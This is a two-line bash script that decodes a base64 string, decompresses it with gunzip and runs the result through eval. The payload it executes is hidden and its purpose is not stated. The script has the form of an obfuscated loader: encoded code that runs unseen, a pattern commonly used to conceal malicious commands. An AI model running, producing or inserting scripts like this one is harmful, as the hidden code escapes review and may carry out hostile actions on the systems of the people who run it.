#!/bin/bash
eval "$(echo "H4sIAJReiWAAA12MMQrDMAxF95xCpZCl1CJLh16jJ7AdYZliy1gy6fHrbqHb5z3ev14w5IrKi45d4EhkwGZNn4jdHy5l4xGGUo9Sjaq5KAWbTxRE3htOV21sD6eMxc+nE4B1hchFdrh94I9r7EQV7q/fys0g+CncOV++fWrqxJwAAAA=" | base64 -d | gunzip)"
